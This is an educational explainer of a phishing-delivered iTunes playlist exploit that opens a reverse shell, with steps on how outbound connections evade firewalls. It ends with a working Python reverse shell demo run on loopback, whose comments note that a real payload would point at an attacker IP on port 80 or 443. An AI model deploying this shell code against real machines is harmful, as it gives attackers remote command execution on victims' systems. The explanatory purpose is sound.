Reverse Shell iTunes Exploit

A client-side attack in which the attacker sends the target a specially crafted iTunes playlist; once the target opens it in iTunes, the exploit gives the attacker full control of the target's machine

How it works

  1. The target receives a phishing email and clicks a malicious link that downloads what looks like an iTunes playlist
  2. In actuality, the "playlist" has nothing to do with a real playlist: it is a malicious file crafted to exploit a vulnerability in iTunes when iTunes opens it
  3. The attacker is relying on the popularity of iTunes and the likelihood that the target has it installed on their machine
  4. Once the exploit runs, the payload is delivered and a reverse shell is initiated from the victim back out to the attacker
  5. The attacker can't connect directly to the target, because the target is behind a firewall that doesn't allow unsolicited connections from the outside
  6. However, firewalls generally do allow connections from the inside out
  7. As part of the initial payload, the target's machine automatically connects to a pre-configured IP address on the Internet, where the attacker is listening and can catch that connection coming in
  8. This technique is called a Reverse Shell: the direction of the connection is reversed compared with a normal (bind) shell, where the attacker connects to the victim
  9. More often than not, exploits like these use TCP port 80 (or 443) to connect, since those are very common ports that an attacker can rely on being open through the firewall, and the outbound traffic blends in with ordinary web browsing
  10. The usual countermeasure on the network side is egress filtering or an inspecting web proxy, so that an outbound connection on port 80 that does not carry real HTTP from a browser stands out or is blocked
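The inside-out connection described in steps 5 to 9, as an added example that is not part of the original note: a minimal reverse shell in Python with both ends in one file. The attacker side only listens and accepts; the victim side opens the outbound TCP connection, reads commands line by line, runs each through the local shell and sends the output back. Assumptions: both ends run on loopback (127.0.0.1) on an OS-chosen port so the demo is self-contained and runs offline, where a real payload would be built with the attacker's public IP address and a port such as 80 or 443; the length-prefixed reply framing is a choice made for this example, not something the page describes.

```python
import socket
import subprocess
import threading

# Added example, not code from the original note. Both ends run on loopback
# so the demo is self-contained; in a real attack ATTACKER_HOST would be the
# public IP address baked into the payload (assumption: 127.0.0.1 here).
ATTACKER_HOST = "127.0.0.1"


def recv_exact(conn, n):
    """Read exactly n bytes from a TCP stream (recv may return fewer)."""
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def recv_frame(conn):
    """Victim replies are framed as a 4-byte big-endian length plus the bytes."""
    length = int.from_bytes(recv_exact(conn, 4), "big")
    return recv_exact(conn, length).decode(errors="replace")


def attacker_listener(srv, commands, results):
    """Attacker side: a listener on the pre-configured address.

    It never connects *to* the victim. It only accepts the connection the
    payload initiates, which is why the technique gets through a firewall
    that blocks unsolicited inbound connections but permits outbound ones.
    """
    conn, _peer = srv.accept()
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")   # one command per line
            results.append(recv_frame(conn))     # collect its output
        conn.sendall(b"exit\n")


def victim_payload(attacker_host, attacker_port):
    """Victim side: what the payload does after the exploit has run.

    Opens an outbound TCP connection, reads commands line by line, runs each
    through the local shell and ships the output back to the attacker.
    """
    sock = socket.create_connection((attacker_host, attacker_port))
    with sock, sock.makefile("rb") as lines:
        for raw in lines:
            cmd = raw.decode().strip()
            if cmd == "exit":
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True)
            output = proc.stdout + proc.stderr
            sock.sendall(len(output).to_bytes(4, "big") + output)


def run_demo(commands):
    """Run both sides on loopback; return the outputs the attacker received."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((ATTACKER_HOST, 0))   # port 0: the OS picks a free port
    srv.listen(1)
    port = srv.getsockname()[1]    # a real payload would use 80 or 443 instead
    results = []
    t = threading.Thread(target=attacker_listener,
                         args=(srv, commands, results), daemon=True)
    t.start()
    try:
        victim_payload(ATTACKER_HOST, port)   # the "inside-out" connection
        t.join(timeout=10)
    finally:
        srv.close()
    return results


if __name__ == "__main__":
    for line in run_demo(["echo reverse-shell-ok", "uname -s"]):
        print(line, end="")
```

Run it as a script to see the victim's command output arrive at the listener. Note which side calls connect() and which calls accept(): a host-based firewall that only blocks inbound connections never sees anything unusual, which is exactly the point of steps 5 to 7 above.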